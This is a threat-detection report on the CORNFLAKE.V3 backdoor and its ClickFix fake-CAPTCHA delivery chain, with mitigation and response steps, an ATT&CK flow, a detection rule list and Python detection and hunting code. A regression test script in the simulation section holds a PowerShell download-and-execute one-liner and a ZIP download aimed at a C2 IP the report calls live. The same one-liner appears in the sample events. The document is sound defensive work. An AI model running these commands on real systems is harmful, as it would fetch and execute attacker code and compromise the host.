SOC Prime Bias: Critical

02 Feb 2026 10:21

A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report describes a multi-stage intrusion chain that begins on compromised websites serving a ClickFix lure: a fake CAPTCHA page that talks the visitor into pasting a PowerShell command into the Windows Run dialog. That command acts as the dropper and installs the CORNFLAKE.V3 backdoor. Two financially motivated actors are implicated: UNC5518, which sells the resulting access as a service, and UNC5774, which deploys the payload. CORNFLAKE.V3 exists in Node.js and PHP variants, supports multiple payload formats, and persists via a Registry Run key. Once established, it performs host reconnaissance, steals credentials, and can fetch additional malware.

Investigation

Mandiant traced suspicious PowerShell execution that launched node.exe from a user AppData path with the -e (inline script) argument. Investigators recovered the PowerShell dropper, the routine it uses to download the Node.js runtime, and the Base64-encoded CORNFLAKE.V3 payload. The analysis documented Registry-based persistence, C2 behavior, and post-compromise actions including Active Directory enumeration and Kerberoasting. A related PHP variant was also identified using comparable tradecraft and was associated with delivery of a WINDYTWIST.SEA backdoor.

Mitigation

Block or tightly control execution of unknown scripts launched from the Windows Run dialog (the "Remove Run menu from Start Menu" user policy disables the dialog where it is not needed), and monitor PowerShell for download-and-execute patterns (irm, iwr or DownloadString piped into iex) that reach unfamiliar domains or IP addresses. Alert on creation of anomalous Registry Run values and on node.exe or php.exe running from AppData with a script path or an inline-script argument (-e for Node.js, -r for PHP). Reduce exposure to ClickFix lures, which are SEO-poisoned fake CAPTCHA pages hosted on compromised sites, through web filtering and user awareness. Add network egress controls so that the Node.js and PHP runtimes can only be downloaded from approved sources.
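The detection points above, turned into code as an added example (this is not SOC Prime's rule content and not code from the Mandiant report): three checks over Sysmon-style process-creation and registry events, covering node.exe/php.exe started from AppData with an inline script, PowerShell download-and-execute one-liners, and Run-key values that launch a script runtime. Field names follow Sysmon Event ID 1 and Event ID 13, the sample events are constructed, and the regexes are a starting point for your own rules rather than the vendor's logic.

```python
# Added example: detection logic for the CORNFLAKE.V3 delivery chain, run over
# constructed Sysmon-style events. Not SOC Prime's or Mandiant's code. Field names
# (Image, CommandLine, ParentImage, TargetObject, Details) follow Sysmon Event ID 1
# (process creation) and Event ID 13 (registry value set); the events are made up.
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

RUNTIME_NAMES = ("node.exe", "php.exe")
APPDATA_RE = re.compile(r"\\AppData\\", re.IGNORECASE)
# Inline-script switches: node -e/--eval, php -r. Surrounding whitespace avoids
# matching "-e" inside an unrelated token such as a file name.
INLINE_SCRIPT_RE = re.compile(r"\s(?:-e|--eval|-r)\s", re.IGNORECASE)
PS_IMAGE_RE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b",
    re.IGNORECASE)
PS_EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)

# Constructed sample telemetry (not real logs). Index 0-2: the chain from the report;
# index 3-4: benign look-alikes that must stay quiet; index 5: the PHP variant.
SAMPLE_EVENTS: List[Event] = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "irm 138.199.161.141:8080/1769990000 | iex"',
     "ParentImage": r"C:\Windows\explorer.exe"},           # pasted into the Run dialog
    {"id": 1, "Image": r"C:\Users\alice\AppData\Roaming\node-v22\node.exe",
     "CommandLine": r'''"C:\Users\alice\AppData\Roaming\node-v22\node.exe" -e "eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())"''',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 13, "Image": r"C:\Users\alice\AppData\Roaming\node-v22\node.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater",
     "Details": r'"C:\Users\alice\AppData\Roaming\node-v22\node.exe" -e "<script>"'},
    {"id": 1, "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 13, "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"id": 1, "Image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "CommandLine": r'''"C:\Users\alice\AppData\Roaming\php\php.exe" -r "eval(base64_decode($argv[1]));" ZWNobyAx''',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def runtime_from_appdata_inline(ev: Event) -> bool:
    """node.exe/php.exe started from a user AppData path with an inline script."""
    if ev.get("id") != 1:
        return False
    image = str(ev.get("Image", ""))
    return (basename(image) in RUNTIME_NAMES
            and APPDATA_RE.search(image) is not None
            and INLINE_SCRIPT_RE.search(str(ev.get("CommandLine", ""))) is not None)


def powershell_download_execute(ev: Event) -> bool:
    """PowerShell command line that both fetches remote content and evaluates it."""
    if ev.get("id") != 1 or not PS_IMAGE_RE.search(str(ev.get("Image", ""))):
        return False
    cmd = str(ev.get("CommandLine", ""))
    return PS_DOWNLOAD_RE.search(cmd) is not None and PS_EXEC_RE.search(cmd) is not None


def run_key_points_to_runtime(ev: Event) -> bool:
    """Run-key value whose data launches a script runtime or carries an inline script."""
    if ev.get("id") != 13 or not RUN_KEY_RE.search(str(ev.get("TargetObject", ""))):
        return False
    details = str(ev.get("Details", ""))
    return (any(name in details.lower() for name in RUNTIME_NAMES)
            or INLINE_SCRIPT_RE.search(details) is not None)


RULES = {
    "runtime_from_appdata_inline": runtime_from_appdata_inline,
    "powershell_download_execute": powershell_download_execute,
    "run_key_points_to_runtime": run_key_points_to_runtime,
}


def evaluate(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule_name, event_index) for every rule that fires on each event."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, i in evaluate(SAMPLE_EVENTS):
        print(f"{name}: event {i} {SAMPLE_EVENTS[i].get('Image')}")
```

Requiring the inline-script switch is what keeps developer machines quiet: version managers such as nvm-windows install Node.js under %APPDATA% by default, so a rule that fired on any node.exe in AppData would be noisy, whereas node.exe -e launched by PowerShell from AppData is the shape this chain actually takes. For the registry rule, Sysmon reports HKCU under HKU\<SID>, so match on the Run subkey path rather than on the hive name.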

Response

If detected, isolate the system, terminate the malicious PowerShell, node.exe, and php.exe processes, and remove the associated Registry Run values (in the reported case the ChromeUpdater value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run). Collect the dropped artifacts, the relevant registry hives, and PowerShell and console command histories for forensics. Reset the passwords of service accounts whose SPNs were Kerberoasted, since the stolen service tickets can be cracked offline, and hunt for lateral movement across the domain. Update detection content with the identified IOCs and TTP patterns.

Attack Flow

    graph TB
      %% Class definitions
      classDef technique fill:#ffcc99
      classDef operator fill:#ff9900
      %% Nodes
      initial_access["<b>Technique</b> - <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Victim visits a compromised site, copies the PowerShell command and runs it via the Run dialog."]
      class initial_access technique
      execution_ps["<b>Technique</b> - <b>T1059.001 PowerShell</b><br/>PowerShell script performs anti-VM checks, then downloads the Node.js runtime and the Base64-encoded CORNFLAKE.V3 JavaScript."]
      class execution_ps technique
      defense_evasion["<b>Technique</b> - <b>T1027 Obfuscated Files or Information</b><br/>Payload delivered as a Base64 string and saved with misleading extensions; C2 traffic is XOR-encrypted."]
      class defense_evasion technique
      persistence["<b>Technique</b> - <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Creates the HKCU\Software\Microsoft\Windows\CurrentVersion\Run value ChromeUpdater pointing to node.exe -e #quot;#lt;script#gt;#quot;."]
      class persistence technique
      discovery_sysinfo["<b>Technique</b> - <b>T1082 System Information Discovery</b><br/>Collects OS version, privilege level, services, drives and ARP table."]
      class discovery_sysinfo technique
      discovery_domain["<b>Technique</b> - <b>T1069.002 Permission Groups Discovery</b>, <b>T1087.002 Account Discovery</b> and <b>T1482 Domain Trust Discovery</b><br/>Enumerates domain controllers, trusts, AD computers and privileged groups if the host is domain-joined."]
      class discovery_domain technique
      credential_kerberoasting["<b>Technique</b> - <b>T1558.003 Kerberoasting</b><br/>Batch script queries SPNs, requests service tickets, extracts the ticket hashes and exfiltrates them."]
      class credential_kerberoasting technique
      c2_http["<b>Technique</b> - <b>T1071.001 Web Protocols</b> with <b>T1132.002 Non-Standard Encoding</b><br/>XOR-encrypted payloads sent over HTTP POST to variable endpoints."]
      class c2_http technique
      credential_ptt["<b>Technique</b> - <b>T1550.003 Pass the Ticket</b><br/>Harvested Kerberos tickets are replayed to access additional resources."]
      class credential_ptt technique
      %% Connections
      initial_access -->|leads_to| execution_ps
      execution_ps -->|enables| defense_evasion
      defense_evasion -->|enables| persistence
      persistence -->|enables| discovery_sysinfo
      discovery_sysinfo -->|enables| discovery_domain
      discovery_domain -->|leads_to| credential_kerberoasting
      credential_kerberoasting -->|uses| c2_http
      c2_http -->|enables| credential_ptt

Detections

  • NodeJS Binary Executing From Uncommon Location (via cmdline). SOC Prime Team, 29 Jan 2026.
  • Suspicious Powershell Strings (via powershell). SOC Prime Team, 29 Jan 2026.
  • Possible NodeJs Being Downloaded By Suspicious Process (via dns_query). SOC Prime Team, 29 Jan 2026.
  • Possible System Enumeration (via cmdline). SOC Prime Team, 28 Jan 2026.
  • Unusual Change Code Page Execution (via cmdline). SOC Prime Team, 18 Dec 2025.
  • Suspicious Domain Trusts Discovery (via cmdline). SOC Prime Team, 20 Jan 2026.
  • Possible System Network Configuration Discovery (via cmdline). SOC Prime Team, 28 Jan 2026.
  • PHP Binary Executed Pointing To Suspicious Directory (via cmdline). SOC Prime Team, 20 Oct 2025.
  • Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event). SOC Prime Team, 29 Jan 2026.
  • IOCs (SourceIP) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor. SOC Prime AI Rules, 29 Jan 2026.
  • IOCs (DestinationIP) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor. SOC Prime AI Rules, 29 Jan 2026.
  • IOCs (HashSha256) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor. SOC Prime AI Rules, 29 Jan 2026.
  • Detection of CORNFLAKE.V3 Backdoor Deployment via PowerShell and Node.js [Windows Process Creation]. SOC Prime AI Rules, 29 Jan 2026.
  • Detection of PowerShell-Based Malware Download and Execution [Windows Powershell]. SOC Prime AI Rules, 22 Oct 2025.
  • Detection of Malicious PowerShell Command Execution for CORNFLAKE.V3 Deployment [Windows Powershell]. SOC Prime AI Rules, 29 Jan 2026.
  • Detect Execution of CORNFLAKE.V3 Backdoor via Node.js [Windows Process Creation]. SOC Prime AI Rules, 29 Jan 2026.
  • PowerShell Command Execution and VM Detection [Windows Powershell]. SOC Prime AI Rules, 29 Jan 2026.
  • CORNFLAKE.V3 Backdoor Persistence via Registry Key [Windows Registry Event]. SOC Prime AI Rules, 22 Oct 2025.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The adversary has obtained a foothold on a compromised workstation and wishes to fetch a fresh payload from a remote C2 server while first confirming the environment is not a sandbox.

    1. Environment Check (T1497.001 Virtualization/Sandbox Evasion: System Checks): Query WMI for computer system details, the same class the dropper's anti-VM check reads.
    2. Download & Execute (T1059.001 PowerShell): Use a PowerShell one-liner that constructs a time-based URL, downloads the script via Invoke-RestMethod (irm), and pipes it to Invoke-Expression (iex).
    3. Secondary Artifact (T1105 Ingress Tool Transfer): Retrieve a ZIP file via Invoke-WebRequest (iwr) for later use.
  • Regression Test Script:

    # ==== Step 1: Environment check (matches selection2) ====
    # Win32_ComputerSystem exposes the manufacturer/model fields that anti-VM checks read.
    Get-WmiObject Win32_ComputerSystem | Out-Null
    
    # ==== Step 2: Time-based download-and-execute (matches selection1) ====
    # $u is the current Unix time with its low four bits cleared (0x...fff0 is -16 as an
    # Int64), so the request path changes every 16 seconds.
    $u = [int64](([datetime]::UtcNow - [datetime]'1970-1-1').TotalSeconds) -band 0xfffffffffffffff0
    # NOTE: 138.199.161.141:8080 is the live C2 address from the report and the value the
    # rule keys on. Never let this line reach it: run it only on an isolated lab host whose
    # egress to that address is redirected to a listener of your own that serves a harmless
    # script, otherwise the regression test becomes a real compromise.
    irm 138.199.161.141:8080/$u | iex
    
    # ==== Step 3: ZIP download via iwr (matches selection3) ====
    $ZipURL = "http://138.199.161.141:8080/payload.zip"
    $ZipFile = Join-Path $env:TEMP "payload.zip"
    iwr -Uri $ZipURL -OutFile $ZipFile
  • Cleanup Commands:

    # Remove the downloaded ZIP file
    Remove-Item -Path (Join-Path $env:TEMP "payload.zip") -Force -ErrorAction SilentlyContinue
    
    # Clear any residual variables
    Remove-Variable -Name u, ZipURL, ZipFile -ErrorAction SilentlyContinue
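Step 2 of the regression script fetches a path derived from the clock, which is itself a hunting lead: the path is a purely numeric epoch value that is a multiple of 16 and lies within seconds of the request's own timestamp. The following added example (not SOC Prime's or Mandiant's code) reverses that construction and runs it over proxy logs; the log format and the sample lines are constructed, and the 120-second skew tolerance is an assumption.

```python
# Added example: hunting proxy logs for the dropper's time-based download path.
# Not SOC Prime's or Mandiant's code. The regression script builds the path as
#   $u = epoch_seconds -band 0xfffffffffffffff0
# i.e. the current Unix time with its low four bits cleared, so a matching request
# has a numeric path that is a multiple of 16 and sits within seconds of the
# request timestamp. The log format and the sample lines are constructed.
import re
from datetime import datetime
from typing import List, Tuple

# Constructed format: "<ISO-8601 UTC> <client IP> <method> <URL> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
NUMERIC_PATH_RE = re.compile(r"^https?://(?P<host>[^/]+)/(?P<path>\d{9,10})$")

SAMPLE_PROXY_LOG = [
    # The dropper's own request: 2026-01-29T10:15:07Z is 1769681707, low 4 bits cleared = 1769681696
    "2026-01-29T10:15:07Z 10.0.0.15 GET http://138.199.161.141:8080/1769681696 200",
    # Numeric path that is a multiple of 16 but nowhere near the request time: must not hit
    "2026-01-29T10:16:00Z 10.0.0.22 GET http://cdn.example.com/1700000000 200",
    # Near-current epoch value that is not 16-aligned: must not hit
    "2026-01-29T10:17:01Z 10.0.0.30 GET http://www.example.org/1769681821 200",
    # The follow-on ZIP fetch has a named path; this heuristic is not meant to catch it
    "2026-01-29T10:16:30Z 10.0.0.15 GET http://138.199.161.141:8080/payload.zip 200",
]


def parse_ts(s: str) -> datetime:
    """Parse the constructed log timestamp (ISO-8601 with a trailing Z) as aware UTC."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def time_based_path(ts: datetime) -> int:
    """Reproduce the dropper's $u for a given time: epoch seconds & ~0xF."""
    return int(ts.timestamp()) & ~0xF


def is_time_based_download(url: str, request_ts: datetime, tolerance_s: int = 120) -> bool:
    """True when the URL path is a 16-aligned epoch value close to the request time.

    tolerance_s absorbs clock skew between the victim and the proxy; 120 s is an
    assumption to tune per environment."""
    m = NUMERIC_PATH_RE.match(url)
    if m is None:
        return False
    value = int(m.group("path"))
    if value & 0xF:
        return False
    return abs(value - time_based_path(request_ts)) <= tolerance_s


def hunt(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client IP, URL) for every log line that matches the heuristic."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        if is_time_based_download(m.group("url"), parse_ts(m.group("ts"))):
            hits.append((m.group("src"), m.group("url")))
    return hits


if __name__ == "__main__":
    for src, url in hunt(SAMPLE_PROXY_LOG):
        print(f"time-based download path: {src} -> {url}")
```

The two negative samples show why both conditions are needed: plenty of CDN paths are large integers, and many of those happen to be multiples of 16, so alignment alone is noise; conversely an epoch-looking number that is not 16-aligned was not produced by this dropper. Treat a hit as a pivot rather than a verdict, and follow it with the destination IP IOCs and the process-creation telemetry from the same host.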